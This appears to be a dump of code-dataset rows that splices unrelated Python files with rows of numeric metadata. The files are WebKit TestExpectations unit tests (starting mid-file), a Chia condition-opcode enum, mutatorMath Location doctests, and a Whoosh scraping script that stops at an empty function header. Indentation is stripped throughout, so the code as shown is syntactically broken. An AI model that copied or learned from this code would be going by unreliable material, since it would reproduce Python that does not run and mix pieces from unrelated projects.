self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_first_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win Release ] failures/expected/foo.html [ Failure ]
# This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual(""" # This comment line should not get stripped.
Bug(y) [ Win Debug ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
def test_remove_flaky_line(self):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
test_port.test_exists = lambda test: True
test_port.test_isfile = lambda test: True
test_config = test_port.test_configuration()
test_port.expectations_dict = lambda: {'expectations': """Bug(x) [ Win ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
"""}
expectations = TestExpectations(test_port)
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', test_config)])
actual_expectations = expectations.remove_configurations([('failures/expected/foo.html', host.port_factory.get('test-win-win7', None).test_configuration())])
self.assertEqual("""Bug(x) [ Win Debug ] failures/expected/foo.html [ Failure Timeout ]
Bug(y) [ Mac ] failures/expected/foo.html [ Crash ]
""", actual_expectations)
class RebaseliningTest(Base):
def test_get_rebaselining_failures(self):
# Make sure we find a test as needing a rebaseline even if it is not marked as a failure.
self.parse_exp('Bug(x) failures/expected/text.html [ Rebaseline ]\n')
self.assertEqual(len(self._exp.get_rebaselining_failures()), 1)
self.parse_exp(self.get_basic_expectations())
self.assertEqual(len(self._exp.get_rebaselining_failures()), 0)
class TestExpectationsParserTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
self._parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], is_lint_mode=False)
def test_expectation_line_for_test(self):
# This is kind of a silly test, but it at least ensures that we don't throw an error.
test_name = 'foo/test.html'
expectations = set(["PASS", "IMAGE"])
expectation_line = TestExpectationLine()
expectation_line.original_string = test_name
expectation_line.name = test_name
expectation_line.filename = '<Bot TestExpectations>'
expectation_line.line_numbers = '0'
expectation_line.expectations = expectations
self._parser._parse_line(expectation_line)
self.assertEqual(self._parser.expectation_line_for_test(test_name, expectations), expectation_line)
class TestExpectationSerializationTests(unittest.TestCase):
def __init__(self, testFunc):
host = MockHost()
test_port = host.port_factory.get('test-win-xp', None)
self._converter = TestConfigurationConverter(test_port.all_test_configurations(), test_port.configuration_specifier_macros())
unittest.TestCase.__init__(self, testFunc)
def _tokenize(self, line):
return TestExpectationParser._tokenize_line('path', line, 0)
def assert_round_trip(self, in_string, expected_string=None):
expectation = self._tokenize(in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, expectation.to_string(self._converter))
def assert_list_round_trip(self, in_string, expected_string=None):
host = MockHost()
parser = TestExpectationParser(host.port_factory.get('test-win-xp', None), [], is_lint_mode=False)
expectations = parser.parse('path', in_string)
if expected_string is None:
expected_string = in_string
self.assertEqual(expected_string, TestExpectations.list_to_string(expectations, self._converter))
def test_unparsed_to_string(self):
expectation = TestExpectationLine()
self.assertEqual(expectation.to_string(self._converter), '')
expectation.comment = ' Qux.'
self.assertEqual(expectation.to_string(self._converter), '# Qux.')
expectation.name = 'bar'
self.assertEqual(expectation.to_string(self._converter), 'bar # Qux.')
expectation.specifiers = ['foo']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar # Qux.')
expectation.expectations = ['bAz']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ ] # Qux.')
expectation.expectations = ['bAz1', 'baZ2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.specifiers = ['foo1', 'foO2']
self.assertEqual(expectation.to_string(self._converter), '[ FOO1 FOO2 ] bar [ BAZ1 BAZ2 ] # Qux.')
expectation.warnings.append('Oh the horror.')
self.assertEqual(expectation.to_string(self._converter), '')
expectation.original_string = 'Yes it is!'
self.assertEqual(expectation.to_string(self._converter), 'Yes it is!')
def test_unparsed_list_to_string(self):
expectation = TestExpectationLine()
expectation.comment = 'Qux.'
expectation.name = 'bar'
expectation.specifiers = ['foo']
expectation.expectations = ['bAz1', 'baZ2']
# FIXME: case should be preserved here but we can't until we drop the old syntax.
self.assertEqual(TestExpectations.list_to_string([expectation]), '[ FOO ] bar [ BAZ1 BAZ2 ] #Qux.')
def test_parsed_to_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'test/name/for/realz.html'
expectation_line.parsed_expectations = set([IMAGE])
self.assertEqual(expectation_line.to_string(self._converter), None)
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP Release ] test/name/for/realz.html [ ImageOnlyFailure ]')
expectation_line.matching_configurations = set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')])
self.assertEqual(expectation_line.to_string(self._converter), 'Bug(x) [ XP ] test/name/for/realz.html [ ImageOnlyFailure ]')
def test_serialize_parsed_expectations(self):
expectation_line = TestExpectationLine()
expectation_line.parsed_expectations = set([])
parsed_expectation_to_string = dict([[parsed_expectation, expectation_string] for expectation_string, parsed_expectation in TestExpectations.EXPECTATIONS.items()])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), '')
expectation_line.parsed_expectations = set([FAIL])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'fail')
expectation_line.parsed_expectations = set([PASS, IMAGE])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'image pass')
expectation_line.parsed_expectations = set([FAIL, PASS])
self.assertEqual(expectation_line._serialize_parsed_expectations(parsed_expectation_to_string), 'pass fail')
def test_serialize_parsed_specifier_string(self):
expectation_line = TestExpectationLine()
expectation_line.bugs = ['garden-o-matic']
expectation_line.parsed_specifiers = ['the', 'for']
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), 'for the')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'for the win')
expectation_line.bugs = []
expectation_line.parsed_specifiers = []
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, []), '')
self.assertEqual(expectation_line._serialize_parsed_specifiers(self._converter, ['win']), 'win')
def test_format_line(self):
self.assertEqual(TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], 'comment'), '[ MODIFIERS ] name [ EXPECTATIONS ] #comment')
self.assertEqual(TestExpectationLine._format_line([], ['MODIFIERS'], 'name', ['EXPECTATIONS'], None), '[ MODIFIERS ] name [ EXPECTATIONS ]')
def test_string_roundtrip(self):
self.assert_round_trip('')
self.assert_round_trip('[')
self.assert_round_trip('FOO [')
self.assert_round_trip('FOO ] bar')
self.assert_round_trip(' FOO [')
self.assert_round_trip(' [ FOO ] ')
self.assert_round_trip('[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux. ')
self.assert_round_trip('[ FOO ] ] ] bar BAZ')
self.assert_round_trip('[ FOO ] ] ] bar [ BAZ ]')
self.assert_round_trip('FOO ] ] bar ==== BAZ')
self.assert_round_trip('=')
self.assert_round_trip('#')
self.assert_round_trip('# ')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo')
self.assert_round_trip('# Foo :')
self.assert_round_trip('# Foo : =')
def test_list_roundtrip(self):
self.assert_list_round_trip('')
self.assert_list_round_trip('\n')
self.assert_list_round_trip('\n\n')
self.assert_list_round_trip('bar')
self.assert_list_round_trip('bar\n# Qux.')
self.assert_list_round_trip('bar\n# Qux.\n')
def test_reconstitute_only_these(self):
lines = []
reconstitute_only_these = []
def add_line(matching_configurations, reconstitute):
expectation_line = TestExpectationLine()
expectation_line.original_string = "Nay"
expectation_line.bugs = ['Bug(x)']
expectation_line.name = 'Yay'
expectation_line.parsed_expectations = set([IMAGE])
expectation_line.matching_configurations = matching_configurations
lines.append(expectation_line)
if reconstitute:
reconstitute_only_these.append(expectation_line)
add_line(set([TestConfiguration('xp', 'x86', 'release')]), True)
add_line(set([TestConfiguration('xp', 'x86', 'release'), TestConfiguration('xp', 'x86', 'debug')]), False)
serialized = TestExpectations.list_to_string(lines, self._converter)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nBug(x) [ XP ] Yay [ ImageOnlyFailure ]")
serialized = TestExpectations.list_to_string(lines, self._converter, reconstitute_only_these=reconstitute_only_these)
self.assertEqual(serialized, "Bug(x) [ XP Release ] Yay [ ImageOnlyFailure ]\nNay")
def disabled_test_string_whitespace_stripping(self):
# FIXME: Re-enable this test once we rework the code to no longer support the old syntax.
self.assert_round_trip('\n', '')
self.assert_round_trip(' [ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ]', '[ FOO ] bar [ BAZ ]')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
self.assert_round_trip('[ FOO ] bar [ BAZ ] # Qux.', '[ FOO ] bar [ BAZ ] # Qux.')
| 53.053846 | 171 | 0.69407 | 5,711 | 48,279 | 5.653826 | 0.083523 | 0.082753 | 0.0415 | 0.0498 | 0.718604 | 0.671374 | 0.610641 | 0.561368 | 0.488123 | 0.444888 | 0 | 0.002269 | 0.187659 | 48,279 | 909 | 172 | 53.112211 | 0.821031 | 0.0587 | 0 | 0.389127 | 0 | 0.025751 | 0.264251 | 0.110544 | 0 | 0 | 0 | 0.0011 | 0.281831 | 0 | null | null | 0.051502 | 0.011445 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f43e1a04ae83282248b18b6dbfd67624be3b91ef | 396 | py | Python | src/types/condition_opcodes.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 2 | 2019-12-06T01:03:24.000Z | 2020-09-27T00:46:20.000Z | src/types/condition_opcodes.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 1 | 2022-03-25T19:11:21.000Z | 2022-03-25T19:11:21.000Z | src/types/condition_opcodes.py | fakecoinbase/Chia-Networkslashchia-blockchain | 84e6a4da18fb0a790a870cbd516f13c9bc7f0716 | [
"Apache-2.0"
] | 1 | 2022-01-26T11:57:29.000Z | 2022-01-26T11:57:29.000Z | import enum
class ConditionOpcode(bytes, enum.Enum):
UNKNOWN = bytes([49])
AGG_SIG = bytes([50])
CREATE_COIN = bytes([51])
ASSERT_COIN_CONSUMED = bytes([52])
ASSERT_MY_COIN_ID = bytes([53])
ASSERT_TIME_EXCEEDS = bytes([54])
ASSERT_BLOCK_INDEX_EXCEEDS = bytes([55])
ASSERT_BLOCK_AGE_EXCEEDS = bytes([56])
AGG_SIG_ME = bytes([57])
ASSERT_FEE = bytes([58])
| 26.4 | 44 | 0.666667 | 55 | 396 | 4.472727 | 0.563636 | 0.146341 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062696 | 0.194444 | 396 | 14 | 45 | 28.285714 | 0.708464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0 | false | 0 | 0.083333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f44bf9a9e7d126060c606f2277955241062ca844 | 16,741 | py | Python | Lib/mutatorMath/test/objects/location.py | kishorkunal-raj/MutatorMath | d37da6d51739017ca6d6172adbd16ac2da39ed0e | [
"BSD-3-Clause"
] | 93 | 2015-01-13T16:34:11.000Z | 2022-03-13T06:36:57.000Z | Lib/mutatorMath/test/objects/location.py | kishorkunal-raj/MutatorMath | d37da6d51739017ca6d6172adbd16ac2da39ed0e | [
"BSD-3-Clause"
] | 279 | 2015-05-21T10:35:37.000Z | 2022-03-28T17:53:05.000Z | Lib/mutatorMath/test/objects/location.py | kishorkunal-raj/MutatorMath | d37da6d51739017ca6d6172adbd16ac2da39ed0e | [
"BSD-3-Clause"
] | 26 | 2015-01-13T12:02:30.000Z | 2020-12-02T09:42:54.000Z | from mutatorMath.objects.location import Location, biasFromLocations, sortLocations
def _testBiasFromLocations(bias, locs):
"""
# Find the designspace vector for the best bias.
# Test results: (<number of on-axis locations>, <number of off-axis locations>)
>>> locs = [Location(a=10), Location(a=10, b=10, c=10), Location(a=10, c=15), Location(a=5, c=15)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:10, c:15 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
>>> locs = [Location(a=10, b=0), Location(a=5, b=10), Location(a=20, b=0)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:10, b:0 >
>>> _testBiasFromLocations(bias, locs)
(1, 1)
>>> locs = [Location(a=10, b=300), Location(a=20, b=300), Location(a=20, b=600), Location(a=30, b=300)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:20, b:300 >
>>> _testBiasFromLocations(bias, locs)
(3, 0)
>>> locs = [Location(a=-10, b=300), Location(a=0, b=400), Location(a=20, b=300)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location a:-10, b:300 >
>>> _testBiasFromLocations(bias, locs)
(1, 1)
>>> locs = [Location(wt=0, wd=500),
... Location(wt=1000, wd=900),
... Location(wt=1200, wd=900),
... Location(wt=-200, wd=600),
... Location(wt=0, wd=600),
... Location(wt=1000, wd=600),
... Location(wt=1200, wd=600),
... Location(wt=-200, wd=300),
... Location(wt=0, wd=300),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:600, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(5, 3)
>>> locs = [
... Location(wt=1, sz=0),
... Location(wt=0, sz=0),
... Location(wt=0.275, sz=0),
... Location(wt=0.275, sz=1),
... Location(wt=1, sz=1),
... Location(wt=0.125, sz=0.4),
... Location(wt=1, sz=0.4),
... Location(wt=0.6, sz=0.4),
... Location(wt=0, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.125, sz=1),
... Location(wt=0.6, sz=0),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(6, 7)
# Nothing lines up
>>> locs = [
... Location(pop=1),
... Location(snap=1),
... Location(crackle=1)]
>>> bias = biasFromLocations(locs)
>>> bias
<Location crackle:1 >
>>> _testBiasFromLocations(bias, locs)
(0, 2)
# ... why crackle? because it sorts first
>>> locs.sort()
>>> locs
[<Location crackle:1 >, <Location pop:1 >, <Location snap:1 >]
# Two things line up
>>> locs = [
... Location(pop=-1),
... Location(pop=1),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location pop:-1 >
>>> _testBiasFromLocations(bias, locs)
(1, 0)
# Two things line up
>>> locs = [
... Location(pop=-1, snap=-1),
... Location(pop=1, snap=0),
... Location(pop=1, snap=1),
... Location(pop=1, snap=1),
... ]
>>> bias = biasFromLocations(locs)
>>> bias
<Location pop:1, snap:1 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# Almost Nothing Lines Up 1
# An incomplete set of masters can
# create a situation in which there is nothing to interpolate.
# However, we still need to find a bias.
>>> locs = [
... Location(wt=1, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0.400, wt:0.275 >
>>> _testBiasFromLocations(bias, locs)
(1, 2)
# Almost Nothing Lines Up 2
>>> locs = [
... Location(wt=1, sz=0.4),
... Location(wt=0.275, sz=0.4),
... Location(wt=0, sz=1),
... Location(wt=0.6, sz=1),
... Location(wt=0.125, sz=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location sz:0.400, wt:0.275 >
>>> _testBiasFromLocations(bias, locs)
(1, 3)
# A square on the origin
>>> locs = [
... Location(wt=0, wd=0),
... Location(wt=1, wd=0),
... Location(wt=0, wd=1),
... Location(wt=1, wd=1),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:0, wt:0 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# A square, not on the origin
>>> locs = [
... Location(wt=100, wd=100),
... Location(wt=200, wd=100),
... Location(wt=100, wd=200),
... Location(wt=200, wd=200),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:100, wt:100 >
>>> _testBiasFromLocations(bias, locs)
(2, 1)
# A square, not on the origin
>>> locs = [
... Location(wt=200, wd=100),
... Location(wt=100, wd=200),
... Location(wt=200, wd=200),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location wd:200, wt:200 >
>>> _testBiasFromLocations(bias, locs)
(2, 0)
# Two axes, three masters
>>> locs = [
... Location(ct=0, wd=0),
... Location(ct=0, wd=1000),
... Location(ct=100, wd=1000),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location ct:0, wd:1000 >
>>> _testBiasFromLocations(bias, locs)
(2, 0)
# Complex 4 D space
>>> locs = [
... Location(A=0, H=0, G=1000, W=0),
... Location(A=0, H=0, G=1000, W=700),
... Location(A=0, H=0, G=1000, W=1000),
... Location(A=0, H=1000, G=0, W=200),
... Location(A=0, H=1000, G=0, W=300),
... Location(A=0, H=1000, G=0, W=700),
... Location(A=0, H=1000, G=0, W=1000),
... Location(A=1000, H=0, G=0, W=0),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location A:0, G:0, H:1000, W:200 >
>>> locs = [
... Location(S=0, U=0, Wt=54, Wd=385),
... Location(S=0, U=268, Wt=54, Wd=1000),
... Location(S=8, U=550, Wt=851, Wd=126),
... Location(S=8, U=868, Wt=1000, Wd=1000),]
>>> bias = biasFromLocations(locs)
>>> bias
<Location S:0, U:268, Wd:1000, Wt:54 >
# empty locs
>>> locs = []
>>> bias = biasFromLocations(locs)
>>> bias
<Location origin >
"""
rel = []
# translate the test locations over the bias
for l in locs:
rel.append((l - bias).isOnAxis())
# MUST have one origin
assert None in rel
# how many end up off-axis?
offAxis = rel.count(False)
# how many end up on-axis?
onAxis = len(rel)-offAxis-1
# a good bias has more masters at on-axis locations.
return onAxis, offAxis
def test_common():
""" Make a new location with only the dimensions that the two have in common.
>>> a = Location(pop=.25, snap=.5, snip=10)
>>> b = Location(pop=-.35, snap=.6, pip=10)
>>> [n.asTuple() for n in a.common(b)]
[(('pop', 0.25), ('snap', 0.5)), (('pop', -0.35), ('snap', 0.6))]
"""
def test_misc():
"""
>>> l = Location(apop=-1, bpop=10, cpop=-100)
>>> l.isOnAxis()
False
# remove empty dimensions
>>> a = Location(pop=.25, snap=1, plop=0)
>>> a.strip().asTuple()
(('pop', 0.25), ('snap', 1))
# add dimensions, set to 0
>>> a = Location(pop=.25, snap=1)
>>> a.expand(['plop', 'flop'])
>>> a.asTuple()
(('flop', 0), ('plop', 0), ('pop', 0.25), ('snap', 1))
# create a location from a list of name / value tuples.
>>> a = Location()
>>> t = [('weight', 1), ('width', 2), ('zip', 3)]
>>> a.fromTuple(t)
>>> a
<Location weight:1, width:2, zip:3 >
"""
def test_onAxis():
"""
# origin will return None
>>> l = Location(pop=0, aap=0, lalala=0, poop=0)
>>> l.isOnAxis()
# on axis will return axis name
>>> l = Location(pop=0, aap=1, lalala=0, poop=0)
>>> l.isOnAxis()
'aap'
# off axis will return False
>>> l = Location(pop=0, aap=1, lalala=1, poop=0)
>>> l.isOnAxis()
False
"""
def test_distance():
"""
# Hypotenuse distance between two locations.
>>> a = Location(pop=0, snap=0)
>>> b = Location(pop=100, snap=0)
>>> a.distance(b)
100.0
>>> a = Location(pop=0, snap=3)
>>> b = Location(pop=4, snap=0)
>>> a.distance(b)
5.0
>>> a = Location()
>>> b = Location(pop=3, snap=4)
>>> a.distance(b)
5.0
"""
def test_limits_sorts():
""" Test some of the functions that handle Locations.
# get the extent of a group of locations.
>>> a = Location(pop=.25, snap=1, plop=0)
>>> b = Location(pop=-1, aap=10)
>>> c = Location(pop=.25, snap=.5)
>>> d = Location(pop=.35, snap=1)
>>> e = Location(pop=1)
>>> f = Location(snap=1)
>>> l = [a, b, c, d, e, f]
>>> test = Location(pop=.5, snap=.5)
>>> from mutatorMath.objects.mutator import getLimits
>>> limits = getLimits(l, test)
>>> 'snap' in limits and 'pop' in limits
True
>>> limits['snap']
(None, 0.5, None)
>>> limits['pop']
(0.35, None, 1)
# sort a group of locations
>>> sortLocations(l)
([<Location pop:1 >, <Location snap:1 >], [<Location plop:0, pop:0.250, snap:1 >, <Location pop:0.350, snap:1 >], [<Location aap:10, pop:-1 >, <Location pop:0.250, snap:0.500 >])
>>> a1, a2, a3 = sortLocations(l)
# assert that each location in a1 is on axis,
>>> sum([a.isOnAxis() is not None and a.isOnAxis() is not False for a in a1])
2
# assert that each location in a1 is off axis,
>>> sum([a.isOnAxis() is False for a in a2])
2
# how to test for wild locations? Can only see if they're offAxis. Relevant?
>>> sum([a.isOnAxis() is False for a in a3])
2
"""
def test_ambivalence():
""" Test ambivalence qualities of locations.
>>> a = Location(pop=(.25, .33), snap=1, plop=0)
>>> b = Location(pop=.25, snap=1, plop=0)
>>> a.isAmbivalent()
True
>>> b.isAmbivalent()
False
>>> a.spliceX().asTuple() == (('plop', 0), ('pop', 0.25), ('snap', 1))
True
>>> a.spliceY().asTuple() == (('plop', 0), ('pop', 0.33), ('snap', 1))
True
>>> b.spliceX() == b.spliceY()
True
>>> a = Location(pop=(.25, .33), snap=1, plop=0)
>>> a * 2
<Location plop:0, pop:(0.500,0.660), snap:2 >
>>> a * (2,0)
<Location plop:(0.000,0.000), pop:(0.500,0.000), snap:(2.000,0.000) >
"""
def test_asString():
""" Test the conversions to string.
>>> a = Location(pop=(.25, .33), snap=1.0, plop=0)
>>> assert a.asString(strict=False) == "plop:0, pop:(0.250,0.330), snap:1"
>>> assert a.asString(strict=True) == "plop:0, pop:(0.250,0.330), snap:1"
>>> a = Location(pop=0)
>>> assert a.asString() == "pop:0"
>>> assert a.asString(strict=True) == "pop:0"
>>> a = Location(pop=-1, sip=1)
>>> assert a.asString() == "pop:-1, sip:1"
>>> assert a.asString(strict=True) == "pop:-1, sip:1"
>>> a = Location()
>>> assert a.asString() == "origin"
# more string conversions
>>> a = Location(pop=1)
>>> assert a.asSortedStringDict() == [{'value': '1', 'axis': 'pop'}]
>>> a = Location(pop=(0,1))
>>> assert a.asSortedStringDict() == [{'value': '(0,1)', 'axis': 'pop'}]
# a description of the type of location
>>> assert Location(a=1, b=0, c=0).getType() == "on-axis, a"
>>> assert Location(a=1, b=2).getType() == "off-axis, a b"
>>> assert Location(a=1).getType() == "on-axis, a"
>>> assert Location(a=(1,1), b=2).getType() == "off-axis, a b, split"
>>> assert Location().getType() == "origin"
"""
def test_comparisons():
""" Test the math comparison qualities.
The equal operator is useful.
The < and > operators make assumptions about the geometry that might not be appropriate.
>>> a = Location()
>>> a.isOrigin()
True
>>> b = Location(pop=2)
>>> c = Location(pop=2)
>>> b.distance(a)
2.0
>>> a.distance(b)
2.0
>>> assert (a>b) == False
>>> assert (c<b) == False
>>> assert (c==b) == True
"""
def test_sorting():
""" Test the sorting qualities.
>>> a = Location(pop=0)
>>> b = Location(pop=1)
>>> c = Location(pop=2)
>>> d = Location(pop=-1)
>>> l = [b, d, a, c]
>>> l.sort()
>>> l
[<Location pop:-1 >, <Location pop:0 >, <Location pop:1 >, <Location pop:2 >]
>>> e = Location(pop=1, snap=1)
>>> l = [a, e]
>>> l.sort()
>>> l
[<Location pop:0 >, <Location pop:1, snap:1 >]
>>> f = Location(pop=-1, snap=-1)
>>> l = [a, e, f]
>>> l.sort()
>>> l
[<Location pop:0 >, <Location pop:-1, snap:-1 >, <Location pop:1, snap:1 >]
>>> l = [Location(pop=-1), Location(pop=1)]
>>> l.sort()
>>> l
[<Location pop:-1 >, <Location pop:1 >]
"""
def test_basicMath():
""" Test the basic mathematical properties of Location.
# addition
>>> Location(a=1) + Location(a=2) == Location(a=3)
True
# addition of ambivalent location
>>> Location(a=1) + Location(a=(2, 1)) == Location(a=(3,2))
True
# subtraction
>>> Location(a=2) - Location(a=1) == Location(a=1)
True
# subtraction of ambivalent location
>>> Location(a=1) - Location(a=(2, 1)) == Location(a=(-1,0))
True
>>> Location(a=(1,4)) - Location(a=(2, 1)) == Location(a=(-1,3))
True
>>> Location(a=(2,1)) - Location(a=(2, 1)) == Location(a=0)
True
# multiplication
>>> Location(a=3) * 3 == Location(a=9)
True
# multiplication of ambivalent location
>>> Location(a=(2, 1)) * 3 == Location(a=(6,3))
True
# division
>>> Location(a=10) / 2 == Location(a=5)
True
>>> Location(a=10, b=6) / 2 == Location(a=5, b=3)
True
# should raise zero division error
>>> hasRaisedError = False
>>> try:
... Location(a=5) / 0
... except ZeroDivisionError:
... hasRaisedError = True
>>> assert hasRaisedError
# interpolation
>>> a = Location(a=(100, 200))
>>> b = Location(a=(0, 0))
>>> f = 0
>>> a+f*(b-a) == Location(a=(100,200))
True
>>> f = 0.5
>>> a+f*(b-a) == Location(a=(50,100))
True
>>> f = 1
>>> a+f*(b-a) == Location(a=0)
True
"""
def test17():
""" See if getLimits can deal with ambiguous locations.
>>> a = Location(pop=(0.25, 4), snap=1, plop=0)
>>> print(a.split())
(<Location plop:0, pop:0.250, snap:1 >, <Location plop:0, pop:4, snap:1 >)
"""
def regressionTests():
""" Test all the basic math operations
>>> assert Location(a=1) + Location(a=2) == Location(a=3) # addition
>>> assert Location(a=1.0) - Location(a=2.0) == Location(a=-1.0) # subtraction
>>> assert Location(a=1.0) * 2 == Location(a=2.0) # multiplication
>>> assert Location(a=1.0) * 0 == Location(a=0.0) # multiplication
>>> assert Location(a=2.0) / 2 == Location(a=1.0) # division
>>> assert Location(a=(1,2)) * 2 == Location(a=(2,4)) # multiplication with ambivalence
>>> assert Location(a=(2,4)) / 2 == Location(a=(1,2)) # division with ambivalence
>>> assert Location(a=(2,4)) - Location(a=1) == Location(a=(1,3))
"""
if __name__ == '__main__':
import sys
import doctest
sys.exit(doctest.testmod().failed)
| 31.001852 | 182 | 0.483723 | 2,154 | 16,741 | 3.743268 | 0.123955 | 0.092645 | 0.041672 | 0.06474 | 0.522138 | 0.408037 | 0.337219 | 0.248915 | 0.152053 | 0.11745 | 0 | 0.080306 | 0.320889 | 16,741 | 539 | 183 | 31.059369 | 0.628903 | 0.788364 | 0 | 0 | 0 | 0 | 0.010178 | 0 | 0 | 0 | 0 | 0 | 0.04 | 1 | 0.52 | false | 0 | 0.12 | 0 | 0.68 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f455c6130c6e7047719e5d6bcb50686c486d3c61 | 368 | py | Python | Whoosh/pruebas.py | josperdom1/AII | a138ba32dc0afabd86894c044a449d7c2c343780 | [
"MIT"
] | null | null | null | Whoosh/pruebas.py | josperdom1/AII | a138ba32dc0afabd86894c044a449d7c2c343780 | [
"MIT"
] | null | null | null | Whoosh/pruebas.py | josperdom1/AII | a138ba32dc0afabd86894c044a449d7c2c343780 | [
"MIT"
] | null | null | null | from whoosh.index import create_in, open_dir
from whoosh.fields import *
from whoosh.qparser import QueryParser
from tkinter import messagebox
from tkinter import *
from bs4 import BeautifulSoup
from datetime import datetime
import urllib.request
import locale
import os
locale.setlocale(locale.LC_ALL, 'es_ES.UTF-8')
def extract_events():
